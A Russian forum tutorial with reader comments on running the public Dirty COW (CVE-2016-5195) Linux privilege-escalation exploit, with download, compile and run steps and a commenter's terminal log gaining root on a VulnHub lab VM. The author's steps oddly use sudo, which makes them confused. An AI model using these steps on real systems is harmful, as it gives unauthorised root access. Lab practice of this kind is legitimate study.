Статья Dirty Cow Exploit

Привет! В этой статье я хочу показать новый вид уязвимости, которой, подвержены, как пишут специалисты по информационной безопасности, все, без исключения ядра Linux на сегодняшний день. С её помощью локальный пользователь может повысить свои привилегии до root, из-за ошибки состязания в реализации механизма копирования при записи (COW) для страниц памяти, помеченных флагом dirty, при условии, что мы состоим в группе sudo/wheel (FreeBSD). По официальным данным, опубликованным 20.10.2016 года, уязвимость CVE-2016-5195, получившая имя Dirty COW, существовала в ядре Linux, начиная с версии 2.6.22 с 2007 года. Исследователь Фил Остер обнаруживший проблему, уже уведомил RedHat о том, что недавно эксплоит для данной уязвимости был использован в ходе реальных атак. Такие вот дела в мире Linux:) Попробуем проэкплойтить нашу систему.

upload_2016-11-11_21-43-44.png


Переходим по адресу: https://github.com/gbonacini/CVE-2016-5195

upload_2016-11-11_21-44-1.png


И скачиваем архив:

upload_2016-11-11_21-44-21.png


Затем распакуем его в папку локального пользователя, в моем случае /home/necro

upload_2016-11-11_21-44-43.png


Залогинившись под пользователем necro, перейдем в его домашний каталог:

> su necro

> cd ~

Затем перейдем в папку, куда мы распаковывали архив.

> cd CVE-2016-5195-master

> sudo –s make

Все должно пройти без ошибок.

> sudo –s ./dcow

upload_2016-11-11_21-45-32.png


Вводим свой пароль, и пытаемся получить root-доступ, используя тот пароль, который нам подсказывает Dirty Cow:

> su

Вводим его и становимся root!

upload_2016-11-11_21-46-0.png


P.S. На скачанной вчера Debian, эксплоит уже не работает:) Так, что наверное не все так плохо.
Пруф - https://ru.wikipedia.org/wiki/Уязвимость_Dirty_COW
 

Konstantin

One Level
12.11.2016
8
2
Почему через минуту, после получения прав root, комп наглухо виснит?
 
  • Нравится
Реакции: Vander

arbaiten

Green Team
03.12.2017
13
8
Bash:
[email protected]:~/CVE-2016-5195-master$ ls
changelog  CONTRIBUTING.md  dcow.cpp  golang  legacy  makefile  README.md  version
[email protected]:~/CVE-2016-5195-master$ sudo -s make
[sudo] password for webmin:
webmin is not in the sudoers file.  This incident will be reported.
[email protected]:~/CVE-2016-5195-master$ make
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
[email protected]:~/CVE-2016-5195-master$ ls -l
total 80
-rw-rw-r-- 1 webmin webmin  1591 Mar 21  2017 changelog
-rw-rw-r-- 1 webmin webmin   947 Mar 21  2017 CONTRIBUTING.md
-rwxrwxr-x 1 webmin webmin 40159 Jun  1 14:44 dcow
-rw-rw-r-- 1 webmin webmin 10092 Mar 21  2017 dcow.cpp
drwxrwxr-x 3 webmin webmin  4096 Mar 21  2017 golang
drwxrwxr-x 2 webmin webmin  4096 Mar 21  2017 legacy
-rw-rw-r-- 1 webmin webmin   143 Mar 21  2017 makefile
-rw-rw-r-- 1 webmin webmin  2807 Mar 21  2017 README.md
-rw-rw-r-- 1 webmin webmin     7 Mar 21  2017 version
[email protected]:~/CVE-2016-5195-master$ ./dcow
Running ...
Received su prompt (Password: )
Root password is:   dirtyCowFun
Enjoy! :-)
[email protected]:~/CVE-2016-5195-master$ su root
Password:
[email protected]:/home/webmin/CVE-2016-5195-master# id
uid=0(root) gid=0(root) groups=0(root)

На VM с Vulnhub VulnOS: 2 ~ VulnHub отработала

Bash:
[email protected]:/home/webmin/CVE-2016-5195-master# uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
[email protected]:/home/webmin/CVE-2016-5195-master# lsb_release -a
No LSB modules are available.
Distributor ID:    Ubuntu
Description:    Ubuntu 14.04.4 LTS
Release:    14.04
Codename:    trusty
 
Мы в соцсетях:

1 августа стартует курс «Основы программирования на Python» от команды The Codeby

Курс будет начинаться с полного нуля, то есть начальные знания по Python не нужны. Длительность обучения 2 месяца. Учащиеся получат методички, видео лекции и домашние задания. Много практики. Постоянная обратная связь с кураторами, которые помогут с решением возникших проблем.

Запись на курс до 10 августа. Подробнее ...